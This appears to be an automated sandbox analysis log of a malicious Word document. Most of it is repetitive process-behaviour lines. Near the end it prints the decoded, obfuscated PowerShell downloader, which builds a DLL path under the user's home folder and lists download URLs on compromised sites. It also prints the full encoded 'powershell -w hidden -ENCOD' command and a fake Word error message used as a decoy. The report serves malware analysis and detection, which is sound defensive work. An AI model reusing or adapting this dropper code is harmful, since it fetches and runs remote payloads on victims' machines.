Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2556

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 11_2_0023109C FindFirstFileW,

11_2_0023109C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: rundll32.exe, 00000007.00000002.2101005953.00000000006BD000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: rundll32.exe, 00000008.00000002.2102889346.000000000071C000.00000004.00000001.sdmp	Binary or memory string: PPTP00VMware_S

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,

7_2_100011C0

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024C4FF mov eax, dword ptr fs:[00000030h]	7_2_0024C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001EC4FF mov eax, dword ptr fs:[00000030h]	8_2_001EC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019C4FF mov eax, dword ptr fs:[00000030h]	9_2_0019C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023C4FF mov eax, dword ptr fs:[00000030h]	10_2_0023C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0023C4FF mov eax, dword ptr fs:[00000030h]	11_2_0023C4FF

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,

7_2_10001B30

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_10007F07

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 5.2.136.90 80

Jump to behavior

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded $95XUcD = [TYpE]("{0}{2}{4}{3}{1}" -f'SYSTe','CTORy','M','RE','.io.dI') ; sET-ItEm ('V'+'ariABLe'+':FIU') ( [typE]("{1}{4}{0}{6}{5}{3}{2}" -f'M.nET.SeR','sYst','TMaNAGer','N','E','I','vIcEPo'));$ErrorActionPreference = ('Si'+('le'+'n')+('t'+'lyC')+('o'+'nt')+('i'+'nue'));$Hc6c6uy=$I76C + [char](64) + $T36S;$V06B=('I3'+'9H'); (gcI ("VA"+"riAB"+"l"+"E:95"+"XuCd") ).VaLUe::"cReaT`Ed`IR`E`CTORY"($HOME + (('{0}C3re'+'5c3{0}'+'Di'+'_p'+'3'+'c9'+'{0}')-f [CHAR]92));$D15B=(('G2'+'8')+'O'); $fiu::"se`c`UrITYpRoTO`cOL" = (('T'+'ls')+'12');$R32F=('G'+('16'+'Z'));$C7zi9uu = ('O'+('_'+'5Z'));$W_1D=('E'+('19'+'T'));$W7io0wg=$HOME+(('{0}'+('C'+'3re5')+'c3'+'{'+'0}Di_p3c'+'9{'+'0}')-F[Char]92)+$C7zi9uu+('.d'+'ll');$H36A=('R'+('6_'+'O'));$Gr6x_h_=((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'://gi'+'vi')+('ng'+'tha'+'nksd')+'ai'+'l'+('y.c'+'om/qlE/VeF/'+'@]a'+'n')+('w'+'[3://w')+('ap'+'.')+'zh'+('ong'+'l')+'i'+('sc'+'.c'+'o'+'m/wp-inc')+('lu'+'des'+'/Qr'+'yC')+'B/'+'@'+(']'+'anw')+('[3'+'s:/'+'/f'+'n'+'jbq.com/wp-i')+('nc'+'lude'+'s/')+('r'+'lR/@'+']anw['+'3s'+'://sak')+('h'+'isuh'+'an')+'i'+('n'+'arije')+('evik'+'a.')+('c'+'om/')+'w'+('p'+'-i')+('nc'+'lud')+('es'+'/CvG')+('U'+'jvE/@]'+'anw[3:'+'/')+('/'+'z'+'ieflix')+('.'+'tele'+'sk'+'o'+'pstore.co'+'m')+'/c'+'gi'+('-'+'bin')+('/G'+'t3S/@')+']'+'an'+('w['+'3')+'s:'+('//somanap.co'+'m/wp'+'-ad'+'m')+('in'+'/')+'P/')."rePL`AcE"(((']a'+'nw')+'['+'3'),([array]('sd','sw
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $95XUcD = [TYpE]("{0}{2}{4}{3}{1}" -f'SYSTe','CTORy','M','RE','.io.dI') ; sET-ItEm ('V'+'ariABLe'+':FIU') ( [typE]("{1}{4}{0}{6}{5}{3}{2}" -f'M.nET.SeR','sYst','TMaNAGer','N','E','I','vIcEPo'));$ErrorActionPreference = ('Si'+('le'+'n')+('t'+'lyC')+('o'+'nt')+('i'+'nue'));$Hc6c6uy=$I76C + [char](64) + $T36S;$V06B=('I3'+'9H'); (gcI ("VA"+"riAB"+"l"+"E:95"+"XuCd") ).VaLUe::"cReaT`Ed`IR`E`CTORY"($HOME + (('{0}C3re'+'5c3{0}'+'Di'+'_p'+'3'+'c9'+'{0}')-f [CHAR]92));$D15B=(('G2'+'8')+'O'); $fiu::"se`c`UrITYpRoTO`cOL" = (('T'+'ls')+'12');$R32F=('G'+('16'+'Z'));$C7zi9uu = ('O'+('_'+'5Z'));$W_1D=('E'+('19'+'T'));$W7io0wg=$HOME+(('{0}'+('C'+'3re5')+'c3'+'{'+'0}Di_p3c'+'9{'+'0}')-F[Char]92)+$C7zi9uu+('.d'+'ll');$H36A=('R'+('6_'+'O'));$Gr6x_h_=((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'://gi'+'vi')+('ng'+'tha'+'nksd')+'ai'+'l'+('y.c'+'om/qlE/VeF/'+'@]a'+'n')+('w'+'[3://w')+('ap'+'.')+'zh'+('ong'+'l')+'i'+('sc'+'.c'+'o'+'m/wp-inc')+('lu'+'des'+'/Qr'+'yC')+'B/'+'@'+(']'+'anw')+('[3'+'s:/'+'/f'+'n'+'jbq.com/wp-i')+('nc'+'lude'+'s/')+('r'+'lR/@'+']anw['+'3s'+'://sak')+('h'+'isuh'+'an')+'i'+('n'+'arije')+('evik'+'a.')+('c'+'om/')+'w'+('p'+'-i')+('nc'+'lud')+('es'+'/CvG')+('U'+'jvE/@]'+'anw[3:'+'/')+('/'+'z'+'ieflix')+('.'+'tele'+'sk'+'o'+'pstore.co'+'m')+'/c'+'gi'+('-'+'bin')+('/G'+'t3S/@')+']'+'an'+('w['+'3')+'s:'+('//somanap.co'+'m/wp'+'-ad'+'m')+('in'+'/')+'P/')."rePL`AcE"(((']a'+'nw')+'['+'3'),([array]('sd','sw			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJ